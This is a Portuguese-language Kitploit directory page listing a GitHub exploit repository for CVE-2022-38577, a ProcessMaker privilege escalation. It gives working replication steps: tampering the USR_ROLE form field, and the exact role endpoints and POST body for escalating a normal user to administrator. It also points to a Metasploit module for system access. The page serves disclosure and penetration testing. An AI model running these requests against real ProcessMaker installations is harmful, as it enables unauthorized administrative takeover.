Skip to content
KitploitKITPLOIT
FerramentasBlog
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2022-38577-Processmaker — ProcessMaker anterior à v3.5.4 foi descoberto como contendo permissões inseguras na página de perfil do usuário. Esta vulnerabilidade permite que atacantes elevem usuários normais a Administradores. | Kitploit
Ferramentas/GitHubGitHub/sornram9254/cve-2022-38577-processmaker
Escalada de PrivilégiosFrameworks de ExploraçãoAnálise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoArchived
GitHubsornram9254/cve-2022-38577-processmaker

CVE-2022-38577-Processmaker

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

ProcessMaker anterior à v3.5.4 foi descoberto como contendo permissões inseguras na página de perfil do usuário. Esta vulnerabilidade permite que atacantes elevem usuários normais a Administradores.

Ver Repositório
313há 1 anoAinda não revisado

Este repositório foi arquivado e movido para: https://github.com/sornram9254/CVE-BBP-VDP


ProcessMaker - Escalação de Privilégio no Perfil de Usuário

CVE-2022-38577

Descobriu-se que o ProcessMaker anterior à v3.5.4 contém permissões inseguras na página de perfil do usuário. Essa vulnerabilidade permite que atacantes elevem usuários normais a Administradores.

* Este exploit pode ser usado com o módulo Metasploit (ProcessMaker Plugin Upload) - exploit/multi/http/processmaker_plugin_upload para obter acesso ao sistema.

root@kitploit:~
Privilege Escalation replication.
for 2.5.0 - 3.0 GA:
    1. Log in as normal user.
    2. Change "USR_ROLE" on post request form when updating profile information to "PROCESSMAKER_ADMIN".
    3. Refresh page to get new role.

for 3.2.1 and before:
    1. Log in as normal user.
    2. Get Role ID by request "/sysworkflow/en/neoclassic/roles/roles_Ajax?request=rolesList&_dc={epoch_time}"
    3. Get Permission ID by request "/sysworkflow/en/neoclassic/roles/data_rolesPermissions?rUID={Role_ID}&type=show"
    4. Update role to escalation privileges using POST Body request:
    POST /sysworkflow/en/neoclassic/roles/roles_Ajax
    request=assignPermissionToRoleMultiple&ROL_UID={Role_ID}&PER_UID={PERMISSION_ID}

https://youtu.be/PVaChDG3ZQ0
CVE-2022-38577 : ProcessMaker - Escalação de Privilégio no Perfil de Usuário

TODO: Otimizar o código [módulo requests] e o tratamento de exceções.

Reference:
[x] https://nvd.nist.gov/vuln/detail/CVE-2022-38577
[x] https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-38577
[x] https://packetstormsecurity.com/files/168427/ProcessMaker-Privilege-Escalation.html
[x] https://drive.google.com/file/d/1iP9NYUkYEy_FGMpcnTkUWn8nGcqDT02_/view?usp=sharing

Baixar ferramenta